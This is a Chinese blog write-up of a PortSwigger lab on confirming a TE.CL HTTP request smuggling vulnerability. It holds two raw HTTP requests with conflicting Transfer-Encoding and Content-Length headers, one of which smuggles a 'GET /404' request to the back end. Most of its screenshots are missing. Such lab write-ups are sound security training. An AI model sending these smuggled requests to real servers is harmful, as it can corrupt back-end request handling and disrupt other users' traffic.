某不知名博客
carsaid
2024-01-20
目录

从业者-响应差异-确认TE.CL漏洞

# 实验室:HTTP请求走私-通过响应差异确认TE.CL漏洞

# 题目

此实验室涉及前端和后端服务器,后端服务器不支持分块编码。

若要解决实验室问题,请走私一个请求到后端服务器,使后续对/(Web 根目录)的请求触发 404 Not Found 响应。

笔记

尽管实验室支持 HTTP/2,但预期的解决方案需要依靠 HTTP/1 中的可用技术。你可以在 Burp Repeater 的面板 “Inspector > Request attributes” 部分手动切换协议。

提示

在请求走私攻击中,手动修复长度字段可能很棘手。我们的 Burp 扩展 HTTP Request Smuggler (opens new window) 可以提供这方面的帮助。你可以通过 BApp Store 安装它。

实验室-从业者

HTTP请求走私-通过响应差异确认TE.CL漏洞 >>

- name: 实验室-从业者
  desc: HTTP请求走私-通过响应差异确认TE.CL漏洞 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-te-cl-via-differential-responses
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实操

(目前只有图,文字后面有时间补)

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image Not Found Image Not Found Image 
POST / HTTP/1.1
Host: ...
Transfer-Encoding: chunked
Content-Length: 6

0

X
1
2
3
4
5
6
7
8
Not Found Image 
POST / HTTP/1.1
Host: ...
Transfer-Encoding: chunked
Content-Length: 4

2c
GET /404 HTTP/1.1
Content-Length: 100

x=
0
1
2
3
4
5
6
7
8
9
10
11
12
13
Not Found Image Not Found Image Not Found Image
编辑 (opens new window)
从业者-响应差异-确认CL.TE漏洞
从业者-利用请求走私-CL.TE绕过前端安全控制

从业者-利用请求走私-CL.TE绕过前端安全控制

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License